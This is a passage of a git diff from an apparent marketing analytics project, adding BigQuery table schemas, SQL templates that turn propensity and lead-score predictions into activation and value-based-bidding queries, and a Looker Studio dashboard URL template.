This metric is returned as a fraction; for example, 0.092 means 9.2% of active users were first-time purchasers" - }, - { - "name": "first_time_purchasers_per_new_user", - "type": "FLOAT", - "description": "The average number of first-time purchasers per new user" - }, - { - "name": "avg_user_conversion_rate", - "type": "FLOAT", - "description": "The average number of converting user per total users" - }, - { - "name": "avg_session_conversion_rate", - "type": "FLOAT", - "description": "The average number of converting session per total sessions" - }, { "name": "will_purchase", "type": "INTEGER", diff --git a/sql/schema/table/user_rolling_window_lead_metrics.json b/sql/schema/table/user_rolling_window_lead_metrics.json new file mode 100644 index 00000000..e22d0ceb --- /dev/null +++ b/sql/schema/table/user_rolling_window_lead_metrics.json @@ -0,0 +1,242 @@ +[ + { + "name": "processed_timestamp", + "type": "TIMESTAMP", + "description": "Timestamp of when the data was processed" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "The date serving as basis for the features calculation" + }, + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "scroll_50_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 1 day" + }, + { + "name": "scroll_50_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 2nd day" + }, + { + "name": "scroll_50_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 3rd day" + }, + { + "name": "scroll_50_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 4th day" + }, + { + "name": "scroll_50_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 5th day" + }, + { + "name": "scroll_90_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past day" + }, + { + "name": "scroll_90_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 2nd day" + }, + { + "name": "scroll_90_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 3rd day" + }, + { + "name": "scroll_90_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 4th day" + }, + { + "name": "scroll_90_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 5th day" + }, + { + "name": "view_search_results_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "view_search_results_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "view_search_results_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "view_search_results_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "view_search_results_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "file_download_past_1_day", + "type": "INTEGER", + "description": "The number of 
times the user has visited in the past day" + }, + { + "name": "file_download_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "file_download_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "file_download_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "file_download_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "recipe_add_to_list_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past day" + }, + { + "name": "recipe_add_to_list_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 2nd day" + }, + { + "name": "recipe_add_to_list_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 3rd day" + }, + { + "name": "recipe_add_to_list_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 4th day" + }, + { + "name": "recipe_add_to_list_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 5th day" + }, + { + "name": "recipe_print_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past day" + }, + { + "name": "recipe_print_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 2nd day" + }, + { + "name": "recipe_print_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 3rd day" + }, + { + "name": "recipe_print_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 4th day" + }, + { + "name": "recipe_print_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 5th day" + }, + { + "name": "sign_up_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "sign_up_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "sign_up_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "sign_up_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "sign_up_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_favorite_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_favorite_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_favorite_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_favorite_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + 
}, + { + "name": "recipe_favorite_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_add_to_menu_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_add_to_menu_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_add_to_menu_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_add_to_menu_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_add_to_menu_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + } +] \ No newline at end of file diff --git a/sql/schema/table/vbb_activation_configuration.json b/sql/schema/table/vbb_activation_configuration.json new file mode 100644 index 00000000..f0cbf242 --- /dev/null +++ b/sql/schema/table/vbb_activation_configuration.json @@ -0,0 +1,17 @@ +[ + { + "name": "activation_type", + "type": "STRING", + "description": "Specifies the type of activation, e.g., purchase-propensity" + }, + { + "name": "decile", + "type": "INTEGER", + "description": "Represents the decile number (1-10) for the prediction" + }, + { + "name": "value", + "type": "FLOAT", + "description": "The monetary value multiplier for the given decile, relative to the average transaction value" + } +] diff --git a/templates/activation_query/audience_segmentation_query_template.sqlx b/templates/activation_query/audience_segmentation_query_template.sqlx index 40c8c9a5..89eec5e0 100644 --- a/templates/activation_query/audience_segmentation_query_template.sqlx +++ b/templates/activation_query/audience_segmentation_query_template.sqlx @@ -1,8 +1,9 @@ SELECT - a.prediction AS a_s_prediction, + a.prediction AS user_prop_a_s_prediction, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/auto_audience_segmentation_query_template.sqlx b/templates/activation_query/auto_audience_segmentation_query_template.sqlx index 5b6c0eef..d4f0c02a 100644 --- a/templates/activation_query/auto_audience_segmentation_query_template.sqlx +++ b/templates/activation_query/auto_audience_segmentation_query_template.sqlx @@ -1,12 +1,13 @@ SELECT - a.prediction AS a_a_s_prediction, + a.prediction AS user_prop_a_a_s_prediction, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, `{{source_table}}` a WHERE - a.user_id = b.user_pseudo_id + a.user_pseudo_id = b.user_pseudo_id AND a.prediction IS NOT 
NULL diff --git a/templates/activation_query/churn_propensity_query_template.sqlx b/templates/activation_query/churn_propensity_query_template.sqlx index 5ab39212..ae42604a 100644 --- a/templates/activation_query/churn_propensity_query_template.sqlx +++ b/templates/activation_query/churn_propensity_query_template.sqlx @@ -1,9 +1,10 @@ SELECT - a.prediction AS c_p_prediction, - NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS c_p_decile, + a.prediction AS user_prop_c_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS user_prop_c_p_decile, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/cltv_query_template.sqlx b/templates/activation_query/cltv_query_template.sqlx index 3a94982d..bdd4bffd 100644 --- a/templates/activation_query/cltv_query_template.sqlx +++ b/templates/activation_query/cltv_query_template.sqlx @@ -1,8 +1,9 @@ SELECT - NTILE(10) OVER (ORDER BY a.prediction DESC) AS cltv_decile, + NTILE(10) OVER (ORDER BY a.prediction DESC) AS user_prop_cltv_decile, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/lead_score_propensity_query_template.sqlx b/templates/activation_query/lead_score_propensity_query_template.sqlx new file mode 100644 index 00000000..5ad0b874 --- /dev/null +++ b/templates/activation_query/lead_score_propensity_query_template.sqlx @@ -0,0 +1,14 @@ +SELECT + a.prediction AS user_prop_l_s_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS user_prop_l_s_p_decile, + b.user_pseudo_id AS client_id, + b.user_id AS user_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, + CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date +FROM + `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, + `{{source_table}}` a +WHERE + COALESCE(a.user_id, "") = COALESCE(b.user_id, "") + AND a.user_pseudo_id = b.user_pseudo_id diff --git a/templates/activation_query/lead_score_propensity_vbb_query_template.sqlx b/templates/activation_query/lead_score_propensity_vbb_query_template.sqlx new file mode 100644 index 00000000..9be0e0a9 --- /dev/null +++ b/templates/activation_query/lead_score_propensity_vbb_query_template.sqlx @@ -0,0 +1,35 @@ +WITH user_prediction_decile AS ( + SELECT + a.prediction AS l_s_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS l_s_p_decile, + b.user_pseudo_id AS client_id, + b.user_id AS user_id, + b.ga_session_id AS session_id, + CASE + WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp + ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 
MICROSECOND) + END AS inference_date + FROM + `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_24_hours` b, + `{{source_table}}` a + WHERE + COALESCE(a.user_id, "") = COALESCE(b.user_id, "") + AND a.user_pseudo_id = b.user_pseudo_id) +SELECT + a.l_s_p_prediction AS user_prop_l_s_p_prediction, + a.l_s_p_decile AS user_prop_l_s_p_decile, + b.value AS event_param_value, + 'USD' AS event_param_currency, + a.client_id, + a.user_id, + a.session_id AS event_param_session_id, + a.inference_date +FROM + user_prediction_decile AS a +LEFT JOIN + `${activation_project_id}.${dataset}.vbb_activation_configuration` AS b +ON + a.l_s_p_decile = b.decile +WHERE + b.activation_type = 'lead-score-propensity' +AND b.value > 0 \ No newline at end of file diff --git a/templates/activation_query/purchase_propensity_query_template.sqlx b/templates/activation_query/purchase_propensity_query_template.sqlx index 40fe5c40..985edf03 100644 --- a/templates/activation_query/purchase_propensity_query_template.sqlx +++ b/templates/activation_query/purchase_propensity_query_template.sqlx @@ -1,9 +1,10 @@ SELECT - a.prediction AS p_p_prediction, - NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS p_p_decile, + a.prediction AS user_prop_p_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS user_prop_p_p_decile, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/purchase_propensity_vbb_query_template.sqlx b/templates/activation_query/purchase_propensity_vbb_query_template.sqlx new file mode 100644 index 00000000..f81fce9f --- /dev/null +++ b/templates/activation_query/purchase_propensity_vbb_query_template.sqlx @@ -0,0 +1,35 @@ +WITH user_prediction_decile AS ( + SELECT + a.prediction AS p_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS p_p_decile, + b.user_pseudo_id AS client_id, + b.user_id AS user_id, + b.ga_session_id AS session_id, + CASE + WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp + ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) + END AS inference_date + FROM + `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_24_hours` b, + `{{source_table}}` a + WHERE + COALESCE(a.user_id, "") = COALESCE(b.user_id, "") + AND a.user_pseudo_id = b.user_pseudo_id) +SELECT + a.p_p_prediction AS user_prop_p_p_prediction, + a.p_p_decile AS user_prop_p_p_decile, + b.value AS event_param_value, + 'USD' AS event_param_currency, + a.client_id, + a.user_id, + a.session_id AS event_param_session_id, + a.inference_date +FROM + user_prediction_decile AS a +LEFT JOIN + `${activation_project_id}.${dataset}.vbb_activation_configuration` AS b +ON + a.p_p_decile = b.decile +WHERE + b.activation_type = 'purchase-propensity' +AND b.value > 0 \ No newline at end of file diff --git a/templates/activation_type_configuration_template.tpl b/templates/activation_type_configuration_template.tpl index 22afddc3..913b70a2 100644 --- a/templates/activation_type_configuration_template.tpl +++ b/templates/activation_type_configuration_template.tpl @@ -1,47 +1,54 @@ { 
"audience-segmentation-15": { "activation_event_name": "maj_audience_segmentation_15", - "source_query_template": "${audience_segmentation_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${audience_segmentation_query_template_gcs_path}" }, "auto-audience-segmentation-15": { "activation_event_name": "maj_auto_audience_segmentation_15", - "source_query_template": "${auto_audience_segmentation_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${auto_audience_segmentation_query_template_gcs_path}" }, "cltv-180-180": { "activation_event_name": "maj_cltv_180_180", - "source_query_template": "${cltv_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${cltv_query_template_gcs_path}" }, "cltv-180-90": { "activation_event_name": "maj_cltv_180_90", - "source_query_template": "${cltv_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${cltv_query_template_gcs_path}" }, "cltv-180-30": { "activation_event_name": "maj_cltv_180_30", - "source_query_template": "${cltv_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${cltv_query_template_gcs_path}" }, "purchase-propensity-30-15": { "activation_event_name": "maj_purchase_propensity_30_15", - "source_query_template": "${purchase_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${purchase_propensity_query_template_gcs_path}" + }, + "purchase-propensity-vbb-30-15": { + "activation_event_name": "maj_purchase_propensity_vbb_30_15", + "source_query_template": "${purchase_propensity_vbb_query_template_gcs_path}" }, "purchase-propensity-15-15": { "activation_event_name": "maj_purchase_propensity_15_15", - "source_query_template": "${purchase_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${purchase_propensity_query_template_gcs_path}" }, "purchase-propensity-15-7": { "activation_event_name": "maj_purchase_propensity_15_7", - "source_query_template": "${purchase_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${purchase_propensity_query_template_gcs_path}" }, "churn-propensity-30-15": { "activation_event_name": "maj_churn_propensity_30_15", - "source_query_template": "${churn_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${churn_propensity_query_template_gcs_path}" + }, + "churn-propensity-15-15": { + "activation_event_name": "maj_churn_propensity_15_15", + "source_query_template": "${churn_propensity_query_template_gcs_path}" + }, + "churn-propensity-15-7": { + "activation_event_name": "maj_churn_propensity_15_7", + "source_query_template": "${churn_propensity_query_template_gcs_path}" + }, + "lead-score-propensity-30-15": { + "activation_event_name": "maj_lead_score_propensity_30_15", + "source_query_template": 
"${lead_score_propensity_query_template_gcs_path}" } -} \ No newline at end of file +} diff --git a/templates/activation_user_import/lead_score_propensity_csv_export.sqlx b/templates/activation_user_import/lead_score_propensity_csv_export.sqlx new file mode 100644 index 00000000..376cea56 --- /dev/null +++ b/templates/activation_user_import/lead_score_propensity_csv_export.sqlx @@ -0,0 +1,27 @@ +DECLARE + select_query STRING; +SET + select_query = FORMAT(""" + CREATE TEMPORARY TABLE tmp_selection AS + SELECT + user_pseudo_id AS client_id, + '${ga4_stream_id}' AS stream_id, + prediction AS l_s_p_prediction, + NTILE(10) OVER (ORDER BY prediction_prob DESC) AS l_s_p_decile + FROM `%s` + """, prediction_table_name); +EXECUTE IMMEDIATE + select_query; +EXPORT DATA + OPTIONS ( uri = 'gs://${export_bucket}/csv-export/lead_score_propensity-*.csv', + format = 'CSV', + OVERWRITE = TRUE, + header = TRUE, + field_delimiter = ',' ) AS ( + SELECT + client_id, + stream_id, + l_s_p_prediction, + l_s_p_decile + FROM + tmp_selection ); diff --git a/templates/app_payload_template.jinja2 b/templates/app_payload_template.jinja2 deleted file mode 100644 index 33179784..00000000 --- a/templates/app_payload_template.jinja2 +++ /dev/null @@ -1,20 +0,0 @@ -{ - "client_id": "{{client_id}}", - {{user_id}} - "timestamp_micros": "{{event_timestamp}}", - "nonPersonalizedAds": false, - "consent": { - "ad_user_data": "GRANTED", - "ad_personalization": "GRANTED" - }, - "user_properties": - {{user_properties}}, - "events": [ - { - "name": "{{event_name}}", - "params": { - "session_id": "{{session_id}}" - } - } - ] -} diff --git a/templates/load_vbb_activation_configuration.sql.tpl b/templates/load_vbb_activation_configuration.sql.tpl new file mode 100644 index 00000000..b256e9ca --- /dev/null +++ b/templates/load_vbb_activation_configuration.sql.tpl @@ -0,0 +1,33 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. 
+ +-- Step 1: Load JSON data from GCS into the temporary table +LOAD DATA OVERWRITE `${project_id}.${dataset}.temp_json_data` +FROM FILES ( + format = 'JSON', + uris = ['${config_file_uri}'] +); + +-- Step 2: Transform and load into the final table +CREATE OR REPLACE TABLE `${project_id}.${dataset}.vbb_activation_configuration` AS + SELECT + t.activation_type AS activation_type, + dm.decile, + (t.value_norm * dm.multiplier) AS value + FROM + `${project_id}.${dataset}.temp_json_data` AS t, + UNNEST(t.decile_multiplier) AS dm; + +-- Step 3: Clean up temporary tables +DROP TABLE `${project_id}.${dataset}.temp_json_data`; diff --git a/templates/looker_studio_create_dashboard_url_template.txt b/templates/looker_studio_create_dashboard_url_template.txt index 81eea9cb..5407bd49 100644 --- a/templates/looker_studio_create_dashboard_url_template.txt +++ b/templates/looker_studio_create_dashboard_url_template.txt @@ -1 +1 @@ -https://lookerstudio.google.com/reporting/create?c.reportId=${report_id}&c.explain=true&r.reportName=Marketing%20Analytics%20Sample&ds.GA4_sessions.connector=bigQuery&ds.GA4_sessions.type=TABLE&ds.GA4_sessions.tableId=session_date&ds.GA4_sessions.datasetId=${mds_ga4_product_dataset}&ds.GA4_sessions.projectId=${mds_project}&ds.GA4_sessions.datasourceName=MDS%20GA4%20Sessions&ds.GA4_session_device.connector=bigQuery&ds.GA4_session_device.type=TABLE&ds.GA4_session_device.tableId=session_device_daily_metrics&ds.GA4_session_device.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_device.projectId=${mds_project}&ds.GA4_session_device.datasourceName=MDS%20GA4%20Session%20Device&ds.GA4_session_location.connector=bigQuery&ds.GA4_session_location.type=TABLE&ds.GA4_session_location.tableId=session_location_daily_metrics&ds.GA4_session_location.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_location.projectId=${mds_project}&ds.GA4_session_location.datasourceName=MDS%20GA4%20Session%20Location&ds.GA4_event_page.connector=bigQuery&ds.GA4_event_page.type=TABLE&ds.GA4_event_page.tableId=event_page&ds.GA4_event_page.datasetId=${mds_ga4_product_dataset}&ds.GA4_event_page.projectId=${mds_project}&ds.GA4_event_page.datasourceName=MDS%20GA4%20Event%20Page&ds.GA4_unique_page_views.connector=bigQuery&ds.GA4_unique_page_views.type=TABLE&ds.GA4_unique_page_views.tableId=unique_page_views&ds.GA4_unique_page_views.datasetId=${mds_ga4_product_dataset}&ds.GA4_unique_page_views.projectId=${mds_project}&ds.GA4_unique_page_views.datasourceName=MDS%20GA4%20Unique%20Page%20Views&ds.GA4_page_session.connector=bigQuery&ds.GA4_page_session.type=TABLE&ds.GA4_page_session.tableId=page_session_daily_metrics&ds.GA4_page_session.datasetId=${mds_ga4_product_dataset}&ds.GA4_page_session.projectId=${mds_project}&ds.GA4_page_session.datasourceName=MDS%20GA4%20Page%20Session&ds.Ads_perf_conversions.connector=bigQuery&ds.Ads_perf_conversions.type=TABLE&ds.Ads_perf_conversions.tableId=ad_performance_conversions&ds.Ads_perf_conversions.datasetId=${mds_ads_product_dataset}&ds.Ads_perf_conversions.projectId=${mds_project}&ds.Ads_perf_conversions.datasourceName=MDS%20Ads%20Ad%20Performance%20x%20Conversions&ds.MAJ_resource_link.connector=bigQuery&ds.MAJ_resource_link.type=TABLE&ds.MAJ_resource_link.tableId=resource_link&ds.MAJ_resource_link.datasetId=maj_dashboard&ds.MAJ_resource_link.projectId=${monitor_project}&ds.MAJ_resource_link.datasourceName=MAJ%20Resource%20Link&ds.GA4_base_event.connector=bigQuery&ds.GA4_base_event.type=TABLE&ds.GA4_base_event.tableId=event&ds.GA4_base_event.datasetId=${mds_ga4_base_dataset}&ds.GA4
_base_event.projectId=${mds_project}&ds.GA4_base_event.datasourceName=MDS%20GA4%20Base%20Event&ds.MDS_execution_log.connector=bigQuery&ds.MDS_execution_log.type=TABLE&ds.MDS_execution_log.tableId=${dataform_log_table_id}&ds.MDS_execution_log.datasetId=${logs_dataset}&ds.MDS_execution_log.projectId=${monitor_project}&ds.MDS_execution_log.datasourceName=MDS%20Execution%20Log&ds.Activation_log.connector=bigQuery&ds.Activation_log.type=TABLE&ds.Activation_log.tableId=${dataflow_log_table_id}&ds.Activation_log.datasetId=${logs_dataset}&ds.Activation_log.projectId=${monitor_project}&ds.Activation_log.datasourceName=Activation%20Execution%20Log&ds.Vertex_log.connector=bigQuery&ds.Vertex_log.type=TABLE&ds.Vertex_log.tableId=${vertex_pipelines_log_table_id}&ds.Vertex_log.datasetId=${logs_dataset}&ds.Vertex_log.projectId=${monitor_project}&ds.Vertex_log.datasourceName=Vertex%20AI%20Pipelines%20Log&ds.Aggregated_vbb_volume_daily.connector=bigQuery&ds.Aggregated_vbb_volume_daily.type=TABLE&ds.Aggregated_vbb_volume_daily.tableId=aggregated_value_based_bidding_volume_daily&ds.Aggregated_vbb_volume_daily.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_daily.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_daily.datasourceName=Aggregated%20VBB%20Volume%20Daily&ds.Aggregated_vbb_volume_weekly.connector=bigQuery&ds.Aggregated_vbb_volume_weekly.type=TABLE&ds.Aggregated_vbb_volume_weekly.tableId=aggregated_value_based_bidding_volume_weekly&ds.Aggregated_vbb_volume_weekly.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_weekly.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_weekly.datasourceName=Aggregated%20VBB%20Volume%20Weekly&ds.Aggregated_vbb_correlation.connector=bigQuery&ds.Aggregated_vbb_correlation.type=TABLE&ds.Aggregated_vbb_correlation.tableId=aggregated_value_based_bidding_correlation&ds.Aggregated_vbb_correlation.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_correlation.projectId=${feature_store_project}&ds.Aggregated_vbb_correlation.datasourceName=Aggregated%20VBB%20Correlation&ds.Aggregated_vbb_weights.connector=bigQuery&ds.Aggregated_vbb_weights.type=TABLE&ds.Aggregated_vbb_weights.tableId=vbb_weights&ds.Aggregated_vbb_weights.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_weights.projectId=${feature_store_project}&ds.Aggregated_vbb_weights.datasourceName=Aggregated%20VBB%20Weights&ds.Aggregated_predictions.connector=bigQuery&ds.Aggregated_predictions.type=TABLE&ds.Aggregated_predictions.tableId=latest&ds.Aggregated_predictions.datasetId=${aggregated_predictions_dataset}&ds.Aggregated_predictions.projectId=${feature_store_project}&ds.Aggregated_predictions.datasourceName=Aggregated%20Predictions&ds.User_behaviour_revenue_insights_daily.connector=bigQuery&ds.User_behaviour_revenue_insights_daily.type=TABLE&ds.User_behaviour_revenue_insights_daily.tableId=user_behaviour_revenue_insights_daily&ds.User_behaviour_revenue_insights_daily.datasetId=${gemini_insights_dataset}&ds.User_behaviour_revenue_insights_daily.projectId=${feature_store_project}&ds.User_behaviour_revenue_insights_daily.datasourceName=User%20Behaviour%20Revenue%20Insights%20Daily \ No newline at end of file 
+https://lookerstudio.google.com/reporting/create?c.reportId=${report_id}&c.explain=true&r.reportName=Marketing%20Analytics%20Sample&ds.GA4_sessions.connector=bigQuery&ds.GA4_sessions.type=TABLE&ds.GA4_sessions.tableId=session_date&ds.GA4_sessions.datasetId=${mds_ga4_product_dataset}&ds.GA4_sessions.projectId=${mds_project}&ds.GA4_sessions.datasourceName=MDS%20GA4%20Sessions&ds.GA4_session_device.connector=bigQuery&ds.GA4_session_device.type=TABLE&ds.GA4_session_device.tableId=session_device_daily_metrics&ds.GA4_session_device.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_device.projectId=${mds_project}&ds.GA4_session_device.datasourceName=MDS%20GA4%20Session%20Device&ds.GA4_session_location.connector=bigQuery&ds.GA4_session_location.type=TABLE&ds.GA4_session_location.tableId=session_location_daily_metrics&ds.GA4_session_location.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_location.projectId=${mds_project}&ds.GA4_session_location.datasourceName=MDS%20GA4%20Session%20Location&ds.GA4_event_page.connector=bigQuery&ds.GA4_event_page.type=TABLE&ds.GA4_event_page.tableId=event_page&ds.GA4_event_page.datasetId=${mds_ga4_product_dataset}&ds.GA4_event_page.projectId=${mds_project}&ds.GA4_event_page.datasourceName=MDS%20GA4%20Event%20Page&ds.GA4_unique_page_views.connector=bigQuery&ds.GA4_unique_page_views.type=TABLE&ds.GA4_unique_page_views.tableId=unique_page_views&ds.GA4_unique_page_views.datasetId=${mds_ga4_product_dataset}&ds.GA4_unique_page_views.projectId=${mds_project}&ds.GA4_unique_page_views.datasourceName=MDS%20GA4%20Unique%20Page%20Views&ds.GA4_page_session.connector=bigQuery&ds.GA4_page_session.type=TABLE&ds.GA4_page_session.tableId=page_session_daily_metrics&ds.GA4_page_session.datasetId=${mds_ga4_product_dataset}&ds.GA4_page_session.projectId=${mds_project}&ds.GA4_page_session.datasourceName=MDS%20GA4%20Page%20Session&ds.Ads_perf_conversions.connector=bigQuery&ds.Ads_perf_conversions.type=TABLE&ds.Ads_perf_conversions.tableId=ad_performance_conversions&ds.Ads_perf_conversions.datasetId=${mds_ads_product_dataset}&ds.Ads_perf_conversions.projectId=${mds_project}&ds.Ads_perf_conversions.datasourceName=MDS%20Ads%20Ad%20Performance%